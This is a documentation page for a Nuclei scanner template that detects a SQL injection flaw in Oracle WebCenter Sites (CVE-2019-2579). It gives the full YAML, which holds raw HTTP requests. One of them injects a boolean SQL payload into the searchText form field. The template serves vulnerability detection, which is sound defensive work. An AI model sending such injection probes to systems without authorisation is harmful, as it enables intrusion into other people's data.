Skip to content
Nuclei Templates

Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection

ID: CVE-2019-2579

Severity: medium

Author: leovalcante

Tags: cve,cve2019,oracle,wcs,sqli

Description

Section titled “Description”

The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.

YAML Source

Section titled “YAML Source”
id: CVE-2019-2579


info:
  name: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 - SQL Injection
  author: leovalcante
  severity: medium
  description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data manipulation, or denial of service.
  remediation: |
    Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability.
  reference:
    - https://outpost24.com/blog/Vulnerabilities-discovered-in-Oracle-WebCenter-Sites
    - https://github.com/Leovalcante/wcs_scanner
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2579
    - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 4.3
    cve-id: CVE-2019-2579
    epss-score: 0.00493
    epss-percentile: 0.75701
    cpe: cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: oracle
    product: webcenter_sites
  tags: cve,cve2019,oracle,wcs,sqli


http:
  - raw:
      - |
        GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /cs/ContentServer HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        _authkey_={{authkey}}&pagename=OpenMarket%2FXcelerate%2FAdmin%2FWebReferences&op=search&urlsToDelete=&resultsPerPage=25&searchChoice=webroot&searchText=%27+and+%271%27%3D%270+--+


    matchers-condition: and
    matchers:
      - type: word
        words:
          - "value='' and '1'='0 --"
          - "Use this utility to view and manage URLs"
        condition: and


      - type: status
        status:
          - 200


    extractors:
      - type: regex
        name: authkey
        group: 1
        regex:
          - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
        internal: true
        part: body
# digest: 4a0a00473045022100901b1946e1d1ec22c5ff158dc051e3f1d33181bf6b4f54141b086733ca51ea6002206b5b19f0d1eb689e6d907575b5e271a9b9f693bf01e4a921edd4d05b87210741:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2019/CVE-2019-2579.yaml"

View on Github